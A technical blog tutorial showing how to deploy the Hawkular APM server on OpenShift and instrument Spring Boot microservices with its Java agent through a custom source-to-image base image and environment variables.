/path/to/fbthrift/build/bin/thrift1, which can be used to generate C++ service source. Seem like most of online guides on using FBThrift compiler are outdated, which refers to the python module
thrift_compiler. Rather, this github issue is helpful in making it work. To generate C++ source files from idle file
example.thrift, run:
/path/to/fbthrift/build/bin/thrift1 --gen mstch_cpp2 --templates /path/to/fbthrift/thrift/compiler/generate/templates example.thrift
Content of
example.thrift
# example.thrift namespace cpp tamvm service ExampleService { i32 get_number(1:i32 number); }
Implement ExampleService
Implementing the service code is not much different from Apache Thrift. Output C++ files are generated in
./gen-cpp2 by default. Pay attention to the generated file
ExampleService.h, which contains the interface
ExampleServiceSvIf which we need to override with actual service logic.
class ExampleHandler: public ExampleServiceSvIf { public: int32_t get_number(int32_t n) override { printf ("server: receive %d", n); return n; } };
Create client and server instances
For the purpose of this demo, we are going to have a FBThrift client and a server running in one process.
int main(int argc, char *argv[]) { LOG(INFO) << "Starting test ..."; FLAGS_logtostderr = 1; folly::init(&argc, &argv); // starting server on a separate thread std::thread server_thread([] { auto server = newServer(thrift_port); LOG(INFO) << "server: starts"; server->serve(); }); server_thread.detach(); // wait for a short while // enough for socket opening std::this_thread::sleep_for(std::chrono::milliseconds(50)); // create event runloop, to run on this thread folly::EventBase eb; folly::SocketAddress addr("127.0.0.1", thrift_port); // creating client auto client = newHeaderClient(&eb, addr); std::vector<folly::Future<folly::Unit>> futs; for (int32_t i = 10; i < 14; i++) { LOG(INFO) << "client: send number " << i; auto f = client->future_get_number(i); futs.push_back(std::move(f).thenValue(onReply).thenError<std::exception>(onError)); } collectAll(futs.begin(), futs.end()).thenValue([&eb](std::vector<folly::Try<folly::Unit>>&& v){ LOG(INFO) << "client: received all responses"; eb.terminateLoopSoon(); }); // libevent/epoll loop which keeps main thread from existing. eb.loopForever(); return 0; }
The above code uses
folly::Future based api for clarify. The
RequestCallback api will do just as well.
folly::EventBase is the main run loop on which async callbacks are scheduled. The call to
client->future_get_number does not actually send outbound request right away. Rather, it schedules the task on EventBase run loop to be excuted in batch 1. As a result, request is only actually sent when caller method gives up program control (whether it returns or waits as coroutine) 2. If the actual time when request is sent is important, the
RequestCallback api is useful.
Notice the last line
eb.loopForever is to keep the program from quitting before collecting all responses. You can replace it with other non-blocking wait call. (
std::this_thread::sleep is not one of them.
sleep blocks the main thread and EventBase run loop can’t proceed).
Build and Run
Build and run is basic:
mkdir build && cd build cmake .. make ./fbthrift_ex
If you encounter this error
exception specification in declaration does not match previous declaration, change the compiler to g++ instead of clang++.
Final output:
WARNING: Logging before InitGoogleLogging() is written to STDERR I0123 17:05:29.276188 26497 main.cc:103] Starting test ... I0123 17:05:29.276881 26498 main.cc:110] server: starts I0123 17:05:29.327250 26497 main.cc:121] client: send number 10 I0123 17:05:29.327659 26497 main.cc:121] client: send number 11 I0123 17:05:29.327802 26497 main.cc:121] client: send number 12 I0123 17:05:29.327927 26497 main.cc:121] client: send number 13 I0123 17:05:29.328977 26512 ExampleHandler.h:11] server: receive 11 I0123 17:05:29.328977 26511 ExampleHandler.h:11] server: receive 10 I0123 17:05:29.329150 26510 ExampleHandler.h:11] server: receive 12 I0123 17:05:29.329188 26509 ExampleHandler.h:11] server: receive 13 I0123 17:05:29.329497 26497 main.cc:95] client: get response 10 I0123 17:05:29.329609 26497 main.cc:95] client: get response 11 I0123 17:05:29.329762 26497 main.cc:95] client: get response 12 I0123 17:05:29.329864 26497 main.cc:95] client: get response 13 I0123 17:05:29.329892 26497 main.cc:126] client: received all responses
Again, complete source code of example is here:
|
https://vuamitom.github.io/2019/01/17/fbthrift-for-cpp-service.html
|
CC-MAIN-2019-43
|
refinedweb
| 779
| 53.68
|
Hello
I have some code that I have decorated with a MessageSink Attribute to perform a mediator pattern communication between ViewModels.
The problem I get is: that this method then become marked as unused methods by Resharper.
So I got the hint that I should use MeansImplicitUse to avoid this.
However I tried to annote them with MeansImplicitUse and get the error message that it can only be used on classes. So I cant put it on my decorated method, and putting it on my MessageSinkAttribute class doesnt actually imply the use in the class where the decorated method is.
I would like to avoid putting it on the whole ViewModel if possible but I am not quite sure how this is supposed to work. Is there something I have overlooked or any hints in the right direction would be appreciated.
Hello
Hello Jon
The MeansImplicitUse attribute can be applied to some custom attribute class A that you have in order to tell ReSharper that everything that has attribute A is used implicitly. There's also the UsedImplicitly attribute, that can tell ReSharper that the symbol with that attribute is used implicitly and it shouldn't be counted as unused. So in order to achieve your goal you can either put MeansImplicitUse attribute on your MessageSinkAttribute class or put UsedImplicitly attribute on all methods that you don't want ReSharper to count as unused. Let me know if this helps. Thank you!
Andrey Serebryansky
Senior Support Engineer
JetBrains, Inc
"Develop with pleasure!"
Ah thank you Andrey Serbanski
The UsedImplicitly was what I was looking for. I had some problems when I tried to use the code that you get from the options menu instead of the dll directly but I guess it was a namespace issue.
But it works if I referenced the dll directly and use that decorator.
Thank you so much for your patience with me.
On a related note: This guide mentions 4.0 of resharper is this still the latest up to date documentation for all available annotations.?
Jon Warghed
Software Developer
Atea Services and Software
|
https://resharper-support.jetbrains.com/hc/en-us/community/posts/206669465--MeansImplicitUse-on-methods-?page=1
|
CC-MAIN-2020-24
|
refinedweb
| 350
| 61.46
|
The essence of object-oriented progrаmming is the creаtion of new types. A type represents а thing. Sometimes the thing is аbstrаct, such аs а dаtа table or а threаd; sometimes it is more tаngible, such аs а button in а window. A type defines the thing's generаl properties аnd behаviors.
If your progrаm uses three instаnces of а button type in а windowsаy, аn OK, а Cаncel, аnd а Help buttoneаch instаnce will shаre certаin properties аnd behаviors. Eаch, for exаmple, will hаve а size (though it might differ from thаt of its compаnions), а position (though аgаin, it will аlmost certаinly differ in its position from the others), аnd а text lаbel (e.g., "OK," "Cаncel," аnd "Help"). Likewise, аll three buttons will hаve common behаviors, such аs the аbility to be drаwn, аctivаted, pressed, аnd so forth. Thus, the detаils might differ аmong the individuаl buttons, but they аre аll of the sаme type.
As in mаny object-oriented progrаmming lаnguаges, in C# а type is defined by а class, while the individuаl instаnces of thаt class аre known аs objects. Lаter chаpters explаin thаt there аre other types in C# besides classes, including enums, structs, аnd delegаtes, but for now the focus is on classes.
The "Hello World" progrаm declаres а single type: the Hello class. To define а C# type, you declаre it аs а class using the class keyword, give it а nаmein this cаse, Helloаnd then define its properties аnd behаviors. The property аnd behаvior definitions of а C# class must be enclosed by open аnd closed brаces({}).
A class hаs both properties аnd behаviors. Behаviors аre defined with member methods; properties аre discussed in Chаpter 3.
A method is а function owned by your class. In fаct, member methods аre sometimes cаlled member functions. The member methods define whаt your class cаn do or how it behаves. Typicаlly, methods аre given аction nаmes, such аs WriteLine( ) or AddNumbers( ). In the cаse shown here, however, the class method hаs а speciаl nаme, Mаin( ), which doesn't describe аn аction but does designаte to the Common Lаnguаge Runtime (CLR) thаt this is the mаin, or first method, for your class.
The CLR cаlls Mаin( ) when your progrаm stаrts. Mаin( ) is the entry point for your progrаm, аnd every C# progrаm must hаve а Mаin( ) method.[1]
[1] It is technicаlly possible to hаve multiple Mаin( ) methods in C#; in thаt cаse you use the /mаin commаnd-line switch to tell C# which class contаins the Mаin( ) method thаt should serve аs the entry point to the progrаm.
Method declаrаtions аre а contrаct between the creаtor of the method аnd the consumer (user) of the method. It is likely thаt the creаtor аnd consumer of the method will be the sаme progrаmmer, but this does not hаve to be so: it is possible thаt one member of а development teаm will creаte the method аnd аnother progrаmmer will use it.
To declаre а method, you specify а return vаlue type followed by а nаme. Method declаrаtions аlso require pаrentheses, whether the method аccepts pаrаmeters or not. For exаmple:
int myMethod(int size);
declаres а method nаmed myMethod( ) thаt tаkes one pаrаmeter: аn integer thаt will be referred to within the method аs size. This method returns аn integer vаlue. The return vаlue type tells the consumer of the method whаt kind of dаtа the method will return when it finishes running.
Some methods do not return а vаlue аt аll; these аre sаid to return void, which is specified by the void keyword. For exаmple:
void myVoidMethod( );
declаres а method thаt returns void аnd tаkes no pаrаmeters. In C# you must аlwаys declаre а return type or void.
A C# progrаm cаn аlso contаin comments. Tаke а look аt the first line аfter the opening brаce:
// Use the system console object
The text begins with two forwаrd slаsh mаrks (//). These designаte а comment. A comment is а note to the progrаmmer аnd does not аffect how the progrаm runs. C# supports three types of comments.
The first type, just shown, indicаtes thаt аll text to the right of the comment mаrk is to be considered а comment, until the end of thаt line. This is known аs а C++ style comment.
The second type of comment, known аs а C-style comment, begins with аn open comment mаrk (/*) аnd ends with а closed comment mаrk (*/). This аllows comments to span more thаn one line without hаving to hаve // chаrаcters аt the beginning of eаch comment line, аs shown in Exаmple 2-2.
class HelloWorld { stаtic void Mаin( ) { /* Use the system console object аs explаined in the text in chаpter 2 */ System.Console.WriteLine("Hello World"); } }
It is possible to nest C++-style comments within C-style comments. For this reаson, it is common to use C++-style comments whenever possible, аnd to reserve the C-style comments for "commenting-out" blocks of code.
The third аnd finаl type of comment thаt C# supports is used to аssociаte externаl XML-bаsed documentаtion with your code, аnd is illustrаted in Chаpter 13.
"Hello World" is аn exаmple of а console progrаm. A console аpplicаtion hаs no grаphicаl user interfаce (GUI); there аre no list boxes, buttons, windows, аnd so forth. Text input аnd output is hаndled through the stаndаrd console (typicаlly а commаnd or DOS window on your PC). Sticking to console аpplicаtions for now helps simplify the eаrly exаmples in this book, аnd keeps the focus on the lаnguаge itself. In lаter chаpters, we'll turn our аttention to Windows аnd web аpplicаtions, аnd аt thаt time we'll focus on the Visuаl Studio .NET GUI design tools.
All thаt the Mаin( ) method does in this simple exаmple is write the text "Hello World" to the monitor. The monitor is mаnаged by аn object nаmed Console. This Console object hаs а method cаlled WriteLine( ) thаt tаkes а string (а set of chаrаcters) аnd writes it to the stаndаrd output. When you run this progrаm, а commаnd or DOS screen will pop up on your computer monitor аnd displаy the words "Hello World."
You invoke а method with the dot operаtor (.). Thus, to cаll the Console object's WriteLine( ) method, you write Console.WriteLine(...), filling in the string to be printed.
Console is only one of а tremendous number of useful types thаt аre pаrt of the .NET Frаmework Clаss Librаry (FCL). Eаch class hаs а nаme, аnd thus the FCL contаins thousаnds of nаmes, such аs ArrаyList, Hаshtable, FileDiаlog, DаtаException, EventArgs, аnd so on. There аre hundreds, thousаnds, even tens of thousаnds of nаmes.
This presents а problem. No developer cаn possibly memorize аll the nаmes thаt the .NET Frаmework uses, аnd sooner or lаter you аre likely to creаte аn object аnd give it а nаme thаt hаs аlreаdy been used. Whаt will hаppen if you develop your own Hаshtable class, only to discover thаt it conflicts with the Hаshtable class thаt .NET provides? Remember, eаch class in C# must hаve а unique nаme.
You certаinly could renаme your Hаshtable class mySpeciаlHаshtable, for exаmple, but thаt is а losing bаttle. New Hаshtable types аre likely to be developed, аnd distinguishing between their type nаmes аnd yours would be а nightmаre.
The solution to this problem is to creаte а nаmespаce. A nаmespаce restricts а nаme's scope, mаking it meаningful only within the defined nаmespаce.
Assume thаt I tell you thаt Jim is аn engineer. The word "engineer" is used for mаny things in English, аnd cаn cаuse confusion. Does he design buildings? Write softwаre? Run а trаin?
In English I might clаrify by sаying "he's а scientist," or "he's а trаin engineer." A C# progrаmmer could tell you thаt Jim is а science.engineer rаther thаn а trаin.engineer. The nаmespаce (in this cаse, science or trаin) restricts the scope of the word thаt follows. It creаtes а "spаce" in which thаt nаme is meаningful.
Further, it might hаppen thаt Jim is not just аny kind of science.engineer. Perhаps Jim grаduаted from MIT with а degree in softwаre engineering, not civil engineering (аre civil engineers especiаlly polite?). Thus, the object thаt is Jim might be defined more specificаlly аs а science.softwаre.engineer. This classificаtion implies thаt the nаmespаce softwаre is meаningful within the nаmespаce science, аnd thаt engineer in this context is meаningful within the nаmespаce softwаre. If lаter you leаrn thаt Chаrlotte is а trаnsportаtion.trаin.engineer, you will not be confused аs to whаt kind of engineer she is. The two uses of engineer cаn coexist, eаch within its own nаmespаce.
Similаrly, if it turns out thаt .NET hаs а Hаshtable class within its System.Collections nаmespаce, аnd thаt I hаve аlso creаted а Hаshtable class within а ProgCShаrp.DаtаStructures nаmespаce, there is no conflict, becаuse eаch exists in its own nаmespаce.
In Exаmple 2-1, the Console object's nаme is restricted to the System nаmespаce by using the code:
System.Console.WriteLine( );
In Exаmple 2-1, the dot operаtor (.) is used both to аccess а method (аnd dаtа) in а class (in this cаse, the method WriteLine( )), аnd to restrict the class nаme to а specific nаmespаce (in this cаse, to locаte Console within the System nаmespаce). This works well becаuse in both cаses we аre "drilling down" to find the exаct thing we wаnt. The top level is the System nаmespаce (which contаins аll the System objects thаt the Frаmework provides); the Console type exists within thаt nаmespаce, аnd the WriteLine( ) method is а member function of the Console type.
In mаny cаses, nаmespаces аre divided into subspаces. For exаmple, the System nаmespаce contаins а number of subnаmespаces such аs Configurаtion, Collections, Dаtа, аnd so forth, while the Collections nаmespаce itself is divided into multiple subnаmespаces.
Nаmespаces cаn help you orgаnize аnd compаrtmentаlize your types. When you write а complex C# progrаm, you might wаnt to creаte your own nаmespаce hierаrchy, аnd there is no limit to how deep this hierаrchy cаn be. The goаl of nаmespаces is to help you divide аnd conquer the complexity of your object hierаrchy.
Rаther thаn writing the word System before Console, you could specify thаt you will be using types from the System nаmespаce by writing the stаtement:
using System;
аt the top of the listing, аs shown in Exаmple 2-3.
using System; class Hello { stаtic void Mаin( ) { //Console from the System nаmespаce Console.WriteLine("Hello World"); } }
Notice the using System stаtement is plаced before the Hello class definition.
Although you cаn designаte thаt you аre using the System nаmespаce, you cаnnot designаte thаt you аre using the System.Console object, аs you cаn with some lаnguаges. Exаmple 2-4 will not compile.
using System.Console; class Hello { stаtic void Mаin( ) { //Console from the System nаmespаce WriteLine("Hello World"); } }
This generаtes the compile error:
error CSO138: A using nаmespаce directive cаn only be аpplied to nаmespаces; 'System. Console' is а class not а nаmespаce
The using keyword cаn sаve а greаt deаl of typing, but it cаn undermine the аdvаntаges of nаmespаces by polluting the nаmespаce with mаny undifferentiаted nаmes. A common solution is to use the using keyword with the built-in nаmespаces аnd with your own corporаte nаmespаces, but perhаps not with third-pаrty components.
C# is cаse-sensitive, which meаns thаt writeLine is not the sаme аs WriteLine, which in turn is not the sаme аs WRITELINE. Unfortunаtely, unlike in Visuаl Bаsic (VB), the C# development environment will not fix your cаse mistаkes; if you write the sаme word twice with different cаses, you might introduce а tricky-to-find bug into your progrаm.
To prevent such а time-wаsting аnd energy-depleting mistаke, you should develop conventions for nаming your vаriаbles, functions, constаnts, аnd so forth. The convention in this book is to nаme vаriаbles with cаmel notаtion (e.g., someVаriаbleNаme), аnd to nаme functions, constаnts, аnd properties with Pаscаl notаtion (e.g., SomeFunction).
The Mаin( )method shown in Exаmple 2-1 hаs one more designаtion. Just before the return type declаrаtion void (which, you will remember, indicаtes thаt the method does not return а vаlue) you'll find the keyword stаtic:
stаtic void Mаin( )
The stаtic keyword indicаtes thаt you cаn invoke Mаin( ) without first creаting аn object of type Hello. This somewhаt complex issue will be considered in much greаter detаil in subsequent chаpters. One of the problems with leаrning а new computer lаnguаge is you must use some of the аdvаnced feаtures before you fully understаnd them. For now, you cаn treаt the declаrаtion of the Mаin( ) method аs tаntаmount to mаgic.
|
http://etutorials.org/Programming/Programming+C.Sharp/Part+I+The+C+Language/Chapter+2.+Getting+Started+Hello+World/2.1+Classes+Objects+and+Types/
|
crawl-001
|
refinedweb
| 2,113
| 71.34
|
On Thu, Nov 26, 1998 at 07:07:20PM +0100, Vladimir Marangozov wrote:
> It's quite unclear to me, even after the 50 types-sig messages that landed
> in my inbox, what an (optional) Python interface is, and why should I feel
> happier if the Scarecrow (or another) formula is implemented in some way
I must say that I am in much the same state. I haven't really seen anyone
try to explain why I should feel happier if static types and interfaces are
implemented in Python. Maybe if someone could give me an example of a real
world problem they couldn't solve in Python because it lacked these features
it would be easier for me to understand the need we are trying to address
here.
Having read through Roger Masse's original paper on "Add Later" types as well
as the various follow ups it seems that the reasons to use static types are:
1. Static types can improve readability by making the programmer's
intentions more explicit,
2. Optimize for increased performance,
3. For detecting type errors,
4. The existing type system in Python is nice for development within small
groups but is not well suited for large-scale development because of the
difficulty in specifying a common interface without implementation to
convey behavior.
All in all, those are, in my opinion, thoroughly unconvincing arguments.
[Caveat: I am neither a language nor a compiler designer and don't know a
whole lot about either so I may be talking out of my ass on all of this. If
I am, I'm sure someone will let me know :-) ]
-------------------------------------------------------------------------
1. I don't think that static types really improve readability in any way
whatsoever. The problem? The type is only shown when the variable is
declared, not every time it is used. Even though C is statically typed lots
of people use Hungarian notation to get around this very problem. If we are
really interested in increasing the readability of programs by making the
programmer's intentions more explicit then why don't we develop a Dutch
naming scheme and use that (i.e. port_h [h => heel]) instead?
-------------------------------------------------------------------------
2. I agree with Skip Montinaro's comments that it's not clear we've come
close to exhausting the performance possibilities of Python as it currently
exists. He and others have pointed out other interesting avenues to explore.
If performance is the concern then I think rather than changing the syntax in
any way we should first try to make nonvisible changes. Maybe there could be
some kind of JIT compiler for Python, I dunno. Would it be possible for
there to be a Python compiler that does global analysis of the entire program
and then does some magic type inferencing and dynamic code recompilation to
notice that var is only ever assigned integers and then generate appropriate
byte code for that situation?
What's more, I'm not convinced that performance is such an issue. I'm
sure that other people have had other experiences, but at my work the only
times that speed has ever mattered it has mattered so much that Python could
never possibly be a contender no matter how fast it is. When Python is
playing the role of a glue or an extension language, it's already fast enough
for every use I've ever seen. On the other hand, even if we do nothing
Python will be twice as fast next year as it is this year. How fast is fast
enough? How slow is too slow?
More to the point, how much will static typing in Python actually affect
these things? Would we be willing to add a change as major as static typing
for a 10% speed increase?
-------------------------------------------------------------------------
3. Roger Masse writes that static typing provides an 'improved level of type
safety and program correctness' but I'm not aware of any empirical evidence
of this. Is this just simply "common sense"? I am wary of "common sense"
that is lacking an empirical foundation. Don't forget that for many people
it was "common sense" that the earth was flat, that the earth was the center
of the universe, and that maggots spontaneously generated from rotten meat.
Why should we rush to change our favorite language when their is no proof
that doing so will provide the benefits we claim we want?
Is a strongly typed system actually safer in any way whatsoever? As Dave
Beazley asks, "are there really huge numbers of people out there writing
unreliable Python programs? Is type-safety going to solve their problem even
if it were available?" Why add a language feature that doesn't solve a
problem? C is a weakly typed language but people still seem to be able to
create "safe" systems in it....
IMHO there would be some problems with static typing in Python anyway. Would
the static type system catch something like the following:
====================================
def myCallable( d : MyClass):
return d.my_method()
val : MyClass
val = MyClass()
del val.my_method
myCallable(val)
====================================
Would the type system notice that I am turning val into something that no
longer conforms to the MyClass interface?
In any case, the static typing unnecessarily restricts me in this example.
The function 'myCallable' doesn't really need to have an object of MyClass
passed in. It only needs something that has the 'my_method'. The proposal
mentions COMPARABLE as one possible 'protocol' used in static typing. But
what if I only implement < and > ? I would still be able to use a lot of
methods that claim to only take COMPARABLE...but the typing system would
prevent me from doing so.
Say some library designer decides that his function will only take numbers.
Now, he _thinks_ that his function only works on integers. Actually, he's
wrong. Because I have this nifty class that I designed that mostly works
like numbers and his function would product the right result if it were
called on my class. But my class aren't numbers. Maybe my class doesn't
form an abelian group under addition for whatever reason. But that has no
effect whatsoever on the ability of this one function to Do The Right Thing
to my class. But I can't use it because the library writer _thought_ he knew
everything about every future user of his functions.
Roger Masse asks of dynamic typing, "More importantly, how do you gain
confidence that an implementation of a file-like object has implemented seek
fully without running it?" Just because I am using a statically typed
language I am not saved. Sure I may have a file-like object that has a
method named seek that takes the parameters I think it's supposed to. But
how do I know it doesn't just delete the file handle instead of actually
doing a seek? With a statically typed language Masse's question simply
becomes,
"More importantly, how do you gain confidence that an implementation of a
file-like object has implemented seek in the way you think it ought to
implement seek without running it?"
In short, I don't think that static typing gives you a whole lot in terms of
safety...certainly not enough to warrant adding the feature to the core
language, even as an optional one. If we had Design By Contract in Python
(with inherited assertions and so forth) would that be sufficient to satisfy
our needs for safety? [BTW, Roger Masse writes that "static typing is a
prerequisite for design by contract" but I don't understand why.]
-------------------------------------------------------------------------
4. I agree that specifying an interface without the implementation would be
nice for larger projects. But couldn't that same kind of information be
generated by some documentation tool like interdoc or whatever the docutils
people have cooked up? Shouldn't people be reading the documentation for the
code rather than the code anyway? Why would we want to encourage people to
bypass the documentation and read the code directly? Why would we want to
encourage skimping on documentation? It seems that adding static typing to
Python as a way of providing documentation to Python code is somewhat
misguided. Instead shouldn't we use __doc__ strings with structured
formatting?
-------------------------------------------------------------------------
In short my complaints about static typing (and protocols/interfaces, I
suppose) are that I don't see what problems these new features would solve
that currently available features can't. I think there are definitely ways
that Python can improve and grow, I just don't think that static types are
one of those ways. I look forward to hearing what proponents of static
typing and protocols think about this.
--
Justus Pendleton <justus@[...].org>
|
http://aspn.activestate.com/ASPN/Mail/Message/types-sig/584351
|
crawl-002
|
refinedweb
| 1,449
| 61.77
|
char num_rcv [20];char num_save [20]; gsm.readSMS(smsdata, 160, num_rcv, 20) //receiving the numberstrcpy( num_save, num_rcv ); // after receiving, store the num_rcv to the num_save
how many numbers I can store in each address?
Quote from: jepoy12 on Mar 10, 2013, 05:50 amhow many numbers I can store in each address?One.
/* *);}
Quote from: Nick Gammon on Mar 10, 2013, 06:17 amQuote from: jepoy12 on Mar 10, 2013, 05:50 amhow many numbers I can store in each address?One.so saying one is absolutely correct but might be slightly misleading to the quick reader.It's one per address and there are 1k addresses.
#include <avr/eeprom.h>#define NUM_MAX 20char num_rcv [NUM_MAX];char num_save [NUM_MAX] EEMEM; // You could have an initial value heregsm.readSMS(smsdata, 160, num_rcv, NUM_MAX);eeprom_write_block(num_save, num_rcv, NUM_MAX);
eeprom_read_block(num_rcv, num_save, NUM_MAX);
#include <SIM900.h>#include <sms.h>SMSGSM sms;#include <avr/eeprom.h>#define NUM_MAX 20char reg_num[NUM_MAX]; // for readingchar save[NUM_MAX]; //store the number receive hereconst char passRx[] = "Regpass#"; //password for registeringchar storage[160]; //message receive storagechar smsdata[160]; //message receivechar EEMEM numberRx[NUM_MAX]; //number receivevoid checkSMS(){ if(gsm.readSMS(smsdata, 160, numberRx, 20)) //read the sms { if(strncmp (smsdata, passRx, 8) == 0) //if password password is correct { sms.SendSMS(numberRx, "Registered"); // send reply eeprom_write_block(save, numberRx, NUM_MAX); //save it on EEPROM }eeprom_read_block(reg_num, save, NUM_MAX); //read the stored data else if (strncmp (numberRx, regnum, 20) == 0) //if it is equal { if (strlen(smsdata) < 151) //check it if greater than 151 { sms.SendSMS(numberRx, "Message received"); //send reply strcpy( storage, smsdata ); //store the message } else //if greater { sms.SendSMS(numberRx, "Max char reached"); //send reply } } }}
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy
|
http://forum.arduino.cc/index.php/topic,152977.0.html
|
CC-MAIN-2016-44
|
refinedweb
| 310
| 54.73
|
The latest version of my VisioAutomation library has been published on codeplex:
Because there are so many components, I’ve drawn this conceptual map to help you see which pieces are useful for you.
QUICK SUMMARY
- VisioAutomation is the name of the CodePlex project, a Visual Studio .SLN, a specific CSPROJ file, a specific DLL, and a namespace.
- VisioAutomation.DLL contains the “core” (lowest-level) features
- VisioAutomation.Extensions – a series of extensions methods. This is meant for the convenience of those doing low-level work with the Visio automation API
- VisioAutomation.Util – Utility classes to simplify common scenarios such as working with Custom properties or Text formatting
- many helper classes –
- looks at the unit tests and the user applications and the higher-level APIs is a good way to see how these work
- VisioAutomation.DOM
- It’s primary purpose is really to enable one to build up a DOM or a model of a diagram and then render that all at once. One way to think about this is that it automates a lot of the techniques of drawing a diagram fast (for example the use of SetFormulas() methods and DropMany() methods )
- VisioAutomation.Scripting
- This is a high-level interface for people writing interactive applications. The scripting API is session-oriented– i.e. it assumes you have an instance of the Visio application you are working against and that typically operations are being performed against the currently selected set of shapes.
- VisioAutomation.Metadata
- This is a new DLL whose only purpose is to provide a “database” of information about visio concepts such as mapping shapesheet cell names to section indices, row indices,and cell indices. In the future I’ll use this for code generation. (Actually it was used to generated a bunch of classes in the “core” API)
- VisioAutomation.VDX
- This is an experimental attempt at a library that created VDX files programmatically. It enables a scenarios for you to generate Visio content without having Visio around. In practice, this is useful for relatively simple documents.
- VisioIPy and VisioPS
- These are command line tools for interactively playing with a Visio application via IronPython 2.6.1 and Powershell 2.0. They both completely rely on the VisioAutomation.Scripting layer
- Here’s a screencast demonstrating VisioPS:
- Visio Power Tools
- If you aren’t interested in code or scripting – this is the tool for you. A small collection of little utilities in the form of a Visio Add-in.
- Like VisioIPy and VisioPS it uses the VisioAutomation.scripting interface
- It works with Visio 2007 and Visio 2010
- Notable changes since the last version
- The Export to XAML feature is still available, but no longer on the File Menu, instead find it under the Power Tools/ Import & Export menu
- Added support for exporting SVG embedded in XTHML
- VisioAutomation Samples
- This is a demonstration app that serve several purposes: #1 it’s a showcase for some of the features, #2 it provides a way of validating that changes in the core libraries haven’t broken real-world scenarios, #3 it demonstrates how to use the core libraries and VisioIPy
- Isotope
- Everything that isn’t directly related to Visio gets put into this utility library. The “Isotope” name is just a placeholder and doesn’t have any special meaning.
DOCUMENTATION [updated 2010-04-15]
I have started (*started*) documenting the project here:
WHAT NEXT
- Changes in the v 2.5 branch will be minimal, bugfix level stuff. My only planned work is to add a “Visio Power Tools 2010” project to make use of the Visio 2010 ribbon interface.
- I’ll be creating a v 3.0 branch. This will be focused on moving to .NET 4.0. It will be experimental for quite some time.
- Now that the core library is done, I need to update all my previous visio blog posts to use the correct APIs () – I anticipate this will take a month or so.
|
https://blogs.msdn.microsoft.com/saveenr/2010/04/14/visioautomation-2-5-1-released/
|
CC-MAIN-2016-30
|
refinedweb
| 653
| 52.49
|
Have no doubt, OpenShift is a great platform for running microservices-architectured applications! However, when it comes to Application Performance Management (APM) some may think there’s an issue because no components are off-the-shelf in the platform. Indeed this makes sense because APM is a tricky problem and may be addressed in many ways depending on application technology – and after all, microservices architecture is also about picking the right technology for the right problem! ;-) However, this article introduces a quite non-intrusive solution for Spring Boot (and more generally servlet-based) microservices by using Hawkular APM.
Hawkular APM?
OpenShift provides a built-in monitoring tool called Hawkular. That tool is in charge of collecting metrics from Docker containers through the Kubernetes interface and storing, aggregating, and visualizing them. The metrics collected are CPU, Memory, Disk, and Network usage. Hawkular offers a “black-box” view of container performance but does not deal with application metrics like service performance or distribution of response time through application layers. For this specific case, the Hawkular community is working on another module called Hawkular APM that provides insight into the way an application executes across multiple (micro) services in a distributed (e.g. cloud) environment. Hawkular APM supports agent-based instrumentation for Java or API based metrics collection for other languages. It also supports distributed tracing frameworks like ZipKin or OpenTracing. It is not provided as a built-in module in OpenShift but it’s really easy to set up on OpenShift and have a Java application being monitored without touching the source code.
OpenShift part setup
First of all, we assume you already have an OpenShift cluster running (through a complete installation, a local
oc cluster up, the Red Hat Container Development Kit or something like Minishift). The first step is to install the Hawkular APM server that will be responsible for storing, aggregating and visualizing the application metrics.
The following commands can be issued in any OpenShift project/namespace of your choice.
# oc create -f secret "hawkular-apm-admin-account" created route "hawkular-apm" created deploymentconfig "hawkular-apm" created deploymentconfig "hawkular-apm-es" created serviceaccount "hawkular-apm" created serviceaccount "hawkular-apm-es" created service "hawkular-apm" created service "hawkular-apm-es" created #
It’s just as easy as this! The OpenShift template for Hawkular APM creates deployments for the server and Elasticsearch backend, services, and a route for accessing the server. Just use the created route within a browser and access the UI after having authenticated with default
admin/password created. Here is the result on the screenshot below:
Container part setup
The next part of the process is to prepare a base Docker image for OpenShift that will be used for containerizing our Spring Boot applications from source. In OpenShift, this process of directly using sources and handling the Dockerization is called Source-to-image. For our Spring Boot / APM purpose, we will start from a base image handling basic Java Dockerization.
The goal of customization is just to retrieve the Hawkular APM Java agent and to make it available as a lib within the base image that will later contain our Spring Boot fat jar application. A little trick here is to temporarily switch to
root user to chmod the Jar file correctly. Otherwise, JVM that will execute with other users not be able to read Java agent Jar during the boot. Here’s the DockerFile:
FROM docker.io/fabric8/s2i-java:1.3.6 ENV APM_VERSION=0.13.0.Final ENV APM_AGENT=/libs/hawkular-apm-agent.jar ADD $APM_AGENT # Temporary switch to root USER root RUN chmod 444 /libs/hawkular-apm-agent.jar # S2I requires a numeric, non-0 UID. This is the UID for the jboss user in the base image USER 185
Now that you’ve got this file, you can produce your own base Docker image and store it into a Docker registry for a later use from OpenShift. You can use for example the Docker Hub registry.
# docker build -t lbroudoux/s2i-java-apm . # ... # docker push lbroudoux/s2i-java-apm # ...
Finally, in order to use this newly-built image on OpenShift and to use it conveniently, we may want to create some ImageStreams and Templates. We’re are not going in details on how to create those files. The one I have used for testing and demonstrating are available in my GitHub sample repository in the
/openshift directory.
Just use these 2 files to declare resources in your OpenShift installation like this:
# oc create -f -n openshift imagestream "spring-boot-apm" created # oc create -f -n openshift template "spring-boot-apm" created
Bring it all together!
It’s now time to create a Spring Boot application to check everything is ok. For that, go to the project/namespace of your choice and use the
spring-boot-apm template that is now available. The default for this template uses the sample Spring Boot microservices of my GitHub repository:. You have nothing to change to have something running. After having pressed the Create button, the build starts (checking out sources, invoking maven build and so on…) and deployment should finish in a few minutes.
At that time, the application is up and you should have a microservice running at. Check your exact route configuration through OpenShift console. However, if you check the Hawkular APM console again, you’ll not notice anything new… That’s because application performance management has not been turned on – it is disabled by default. In order to turn it on, go to your application deployment configuration and manage to add the environment variables like below:
In order to get APM up, you have to add these 4 variables:
–
HAWKULAR_APM_URI: the HTTP URI for accessing your hawkular server (make sure to not use the HTTPS URL, I did not manage to got it working for now),
–
HAWKULAR_APM_USERNAME: the username for connecting APM server, use default
admin user,
–
HAWKULAR_APM_PASSWORD: the password for connecting APM server, use default admin
–
JAVA_OPTIONS: the JVM options for enabling Java agent, use
-javaagent:/libs/hawkular-apm-agent.jar=boot:/libs/hawkular-apm-agent.jar that refers to the Hawkular agent previously added to image libs.
Once you’ve hit the Save button, the deployment is updated, a new container is deployed, and the Spring Boot application is now instrumented by a Hawkular Java agent. Make few calls to the previous “Hello World” microservice and go check the results in Hawkular APM… TADAM !
